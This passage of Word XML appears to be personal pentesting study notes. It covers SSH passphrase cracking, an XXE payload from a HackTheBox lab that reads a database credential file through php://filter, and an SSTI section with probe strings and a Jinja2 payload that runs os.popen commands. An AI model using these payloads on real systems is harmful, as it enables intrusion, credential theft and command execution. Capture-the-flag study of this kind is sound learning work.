          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$sshng</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" at the start since it's just a JohnTheRipper tag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX 15.2.5. SSH Private Key Passphrase</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C81">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Might take a couple of minutes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C82">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C83">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C84">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another way to exploit XXE:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C85">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C86">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the BountyHunter HTB, we saw that the website had a db.php file, but when we visited it, nothing showed up. But now that we can read any file, we can try reading this one. We can guess that it's in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html/db.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C87">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C88">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We need this special XXE payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C89">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C8A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C8B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!DOCTYPE data [</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C8C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;!ENTITY file SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/db.php"&gt; ]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C8D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;bugreport&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C8E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;title&gt;test&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C8F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;cwe&gt;test&lt;/cwe&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C90">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;cvss&gt;test&lt;/cvss&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C91">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;reward&gt;&amp;file;&lt;/reward&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C92">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/bugreport&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C93">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C94">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Notice it has the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">php://filter/read=convert.base64-encode/resource=</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" stuff. It's a PHP-specific feature for filtering streams</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C95">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="277"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">php://filter:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> This is a PHP stream wrapper that allows you to manipulate file streams using filters. It can modify the content of the file being read, such as encoding it, decoding it, or performing other transformations.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C96">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C97">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="277"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">read=convert.base64-encode</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: This specifies a filter operation to be applied to the file content. In this case:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C98">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="277"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">read</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> indicates that the operation will be applied when reading the file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="277"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">convert.base64-encode</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> means that the content of the file will be Base64-encoded.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C9A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C9B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="277"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">resource=/var/www/html/db.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: This specifies the file to be accessed. In this case, it is /var/www/html/db.php, which might contain sensitive information, such as database credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C9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9D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C9E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yo2pz1bh9y07" w:id="388"/>
      <w:bookmarkEnd w:id="388"/>
      <w:hyperlink r:id="rId937">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SSTI</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Server Side Template Injection)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C9F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CA0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId938">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Good guide for SSTI</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Port swigger)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CA1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CA2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3352800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="229" name="image212.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image212.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId939"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3352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CA3">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CA4">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try These:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CA5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="540"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">{{7*7}}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CA6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="540"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">${7*7}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="540"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;%= 7*7 %&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CA8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="540"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">${{7*7}}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CA9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="540"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#{7*7}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CAA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If any of these output 49, then that means we might have SSTI. For example, in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId940">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SSTI1 picoCTF</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, the first one gave an output of 49. So, we used the {{ }} notion. In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId941">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">writeup</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, they crafted this SSTI payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CAB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1299"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen(</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'whoami'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">).read() }}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CAC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1299"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">replace </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">whoami </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">with any command you want</w:t>
      </w:r>
    </w:p>
